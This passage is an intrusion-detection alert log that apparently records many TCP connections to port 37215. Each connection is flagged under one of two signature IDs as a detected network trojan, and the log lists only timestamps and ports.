              Timestamp:05/24/24-10:59:34.420424
              SID:2835222
              Source Port:44752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411614
              SID:2835222
              Source Port:50238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459561
              SID:2829579
              Source Port:57014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661285
              SID:2829579
              Source Port:35002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116330
              SID:2835222
              Source Port:51040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059656
              SID:2835222
              Source Port:50450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694633
              SID:2829579
              Source Port:43714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061416
              SID:2835222
              Source Port:59900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151025
              SID:2835222
              Source Port:45272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045334
              SID:2835222
              Source Port:38882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522367
              SID:2829579
              Source Port:49304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329794
              SID:2835222
              Source Port:45366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681021
              SID:2835222
              Source Port:45860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111396
              SID:2835222
              Source Port:46706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053382
              SID:2835222
              Source Port:43002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478218
              SID:2829579
              Source Port:49276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155569
              SID:2835222
              Source Port:37336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279797
              SID:2829579
              Source Port:59210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487059
              SID:2835222
              Source Port:36996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.607078
              SID:2829579
              Source Port:52980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664455
              SID:2835222
              Source Port:53978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102516
              SID:2829579
              Source Port:43618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.706448
              SID:2835222
              Source Port:59914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553096
              SID:2829579
              Source Port:34554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.068840
              SID:2835222
              Source Port:55358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062283
              SID:2829579
              Source Port:51688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433719
              SID:2835222
              Source Port:54562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.682232
              SID:2835222
              Source Port:52486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102486
              SID:2835222
              Source Port:35074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.747826
              SID:2835222
              Source Port:34060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638937
              SID:2835222
              Source Port:55390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599163
              SID:2829579
              Source Port:54924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.327837
              SID:2835222
              Source Port:34468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061793
              SID:2829579
              Source Port:35936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979774
              SID:2835222
              Source Port:55936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535287
              SID:2835222
              Source Port:40578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860072
              SID:2829579
              Source Port:45096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100883
              SID:2829579
              Source Port:60264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858970
              SID:2829579
              Source Port:45010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833164
              SID:2835222
              Source Port:37258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457809
              SID:2829579
              Source Port:38784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119497
              SID:2835222
              Source Port:34324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642785
              SID:2829579
              Source Port:40908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.992017
              SID:2835222
              Source Port:42292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596262
              SID:2829579
              Source Port:47818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638303
              SID:2835222
              Source Port:39628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624367
              SID:2835222
              Source Port:46450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920607
              SID:2829579
              Source Port:56468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551176
              SID:2829579
              Source Port:40750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404279
              SID:2829579
              Source Port:41678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109295
              SID:2829579
              Source Port:50574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186579
              SID:2835222
              Source Port:53136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101051
              SID:2835222
              Source Port:39310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112022
              SID:2829579
              Source Port:39492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575727
              SID:2829579
              Source Port:41278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188405
              SID:2835222
              Source Port:38346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574335
              SID:2829579
              Source Port:39782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979434
              SID:2835222
              Source Port:57768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516307
              SID:2829579
              Source Port:35164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574596
              SID:2829579
              Source Port:40322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402715
              SID:2829579
              Source Port:43818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530880
              SID:2835222
              Source Port:54706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538061
              SID:2835222
              Source Port:38840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279082
              SID:2829579
              Source Port:58048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423341
              SID:2835222
              Source Port:57680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581713
              SID:2835222
              Source Port:57986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186462
              SID:2829579
              Source Port:37278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429715
              SID:2835222
              Source Port:50752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396618
              SID:2829579
              Source Port:41258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195084
              SID:2835222
              Source Port:60350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833850
              SID:2829579
              Source Port:44356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574473
              SID:2829579
              Source Port:50934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246396
              SID:2829579
              Source Port:35856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554329
              SID:2829579
              Source Port:36392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374516
              SID:2829579
              Source Port:34554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.404303
              SID:2835222
              Source Port:36272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394624
              SID:2835222
              Source Port:45876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503697
              SID:2835222
              Source Port:51574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988483
              SID:2829579
              Source Port:59060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278008
              SID:2835222
              Source Port:45986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.385496
              SID:2829579
              Source Port:56906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585191
              SID:2835222
              Source Port:55610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153060
              SID:2835222
              Source Port:48718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061892
              SID:2835222
              Source Port:33040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303010
              SID:2835222
              Source Port:41336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383363
              SID:2829579
              Source Port:45744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965797
              SID:2835222
              Source Port:59132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503623
              SID:2835222
              Source Port:53390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572648
              SID:2835222
              Source Port:49426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460443
              SID:2829579
              Source Port:49160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235773
              SID:2829579
              Source Port:46518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535099
              SID:2835222
              Source Port:50638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.773409
              SID:2835222
              Source Port:38282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433574
              SID:2829579
              Source Port:40786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329751
              SID:2835222
              Source Port:35312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483558
              SID:2829579
              Source Port:47140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160440
              SID:2835222
              Source Port:42312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420902
              SID:2829579
              Source Port:49922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391555
              SID:2829579
              Source Port:52794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.430595
              SID:2829579
              Source Port:48444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.066014
              SID:2829579
              Source Port:41632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308786
              SID:2835222
              Source Port:58150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099625
              SID:2835222
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638418
              SID:2829579
              Source Port:41236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.383342
              SID:2829579
              Source Port:35108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967508
              SID:2829579
              Source Port:58278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167506
              SID:2835222
              Source Port:44942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397398
              SID:2829579
              Source Port:52430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459472
              SID:2829579
              Source Port:36756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459735
              SID:2829579
              Source Port:38270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186089
              SID:2835222
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.365392
              SID:2835222
              Source Port:57966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.120560
              SID:2835222
              Source Port:44218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544209
              SID:2835222
              Source Port:33372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249672
              SID:2829579
              Source Port:53944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.290217
              SID:2835222
              Source Port:42902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492133
              SID:2835222
              Source Port:56234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623842
              SID:2835222
              Source Port:59744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482222
              SID:2835222
              Source Port:36606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635795
              SID:2829579
              Source Port:40466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671474
              SID:2835222
              Source Port:53022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118415
              SID:2829579
              Source Port:43066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596736
              SID:2829579
              Source Port:43618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594404
              SID:2829579
              Source Port:34728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279449
              SID:2835222
              Source Port:40316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165223
              SID:2829579
              Source Port:55282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.394038
              SID:2835222
              Source Port:40370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599072
              SID:2835222
              Source Port:59732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313568
              SID:2835222
              Source Port:59300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.111808
              SID:2829579
              Source Port:59818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724598
              SID:2835222
              Source Port:48838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433340
              SID:2829579
              Source Port:44514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.607572
              SID:2829579
              Source Port:42114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.798973
              SID:2829579
              Source Port:49468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568310
              SID:2829579
              Source Port:43892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.454565
              SID:2835222
              Source Port:55292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361526
              SID:2835222
              Source Port:42824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835179
              SID:2835222
              Source Port:48226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624759
              SID:2829579
              Source Port:45632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.402179
              SID:2829579
              Source Port:40114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448777
              SID:2829579
              Source Port:54384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.163581
              SID:2829579
              Source Port:39956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431466
              SID:2829579
              Source Port:42926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636882
              SID:2835222
              Source Port:39652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150524
              SID:2829579
              Source Port:45112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063870
              SID:2835222
              Source Port:44802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308583
              SID:2829579
              Source Port:46386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485043
              SID:2829579
              Source Port:47552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553293
              SID:2829579
              Source Port:51256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155000
              SID:2829579
              Source Port:53538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202486
              SID:2835222
              Source Port:55640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965597
              SID:2829579
              Source Port:51756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049184
              SID:2829579
              Source Port:36916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078168
              SID:2835222
              Source Port:38432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663355
              SID:2829579
              Source Port:52832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101433
              SID:2835222
              Source Port:48936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574677
              SID:2829579
              Source Port:42108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989967
              SID:2835222
              Source Port:40238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640959
              SID:2835222
              Source Port:56984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858343
              SID:2835222
              Source Port:51186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234465
              SID:2829579
              Source Port:45982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157586
              SID:2835222
              Source Port:41356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118298
              SID:2835222
              Source Port:49168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639882
              SID:2835222
              Source Port:35810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.418963
              SID:2829579
              Source Port:45212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408078
              SID:2829579
              Source Port:56868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433639
              SID:2835222
              Source Port:50578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.884644
              SID:2829579
              Source Port:51658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459472
              SID:2835222
              Source Port:58402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162375
              SID:2835222
              Source Port:33014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624413
              SID:2829579
              Source Port:50006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.075428
              SID:2835222
              Source Port:49308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187451
              SID:2829579
              Source Port:59566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365262
              SID:2829579
              Source Port:60210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967733
              SID:2835222
              Source Port:56014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976862
              SID:2829579
              Source Port:59858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570634
              SID:2835222
              Source Port:48944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486010
              SID:2829579
              Source Port:39262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157066
              SID:2829579
              Source Port:39498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341166
              SID:2835222
              Source Port:33572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061584
              SID:2835222
              Source Port:56444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156188
              SID:2835222
              Source Port:55958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099853
              SID:2829579
              Source Port:47354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926185
              SID:2835222
              Source Port:41680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764052
              SID:2829579
              Source Port:39208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402859
              SID:2829579
              Source Port:46938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640822
              SID:2835222
              Source Port:49110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801589
              SID:2829579
              Source Port:37902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517962
              SID:2829579
              Source Port:52338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168537
              SID:2835222
              Source Port:57978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.080906
              SID:2829579
              Source Port:56462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111486
              SID:2835222
              Source Port:50924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284088
              SID:2835222
              Source Port:45914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856909
              SID:2829579
              Source Port:51418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329664
              SID:2835222
              Source Port:33758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481701
              SID:2829579
              Source Port:56202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078070
              SID:2835222
              Source Port:42610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300365
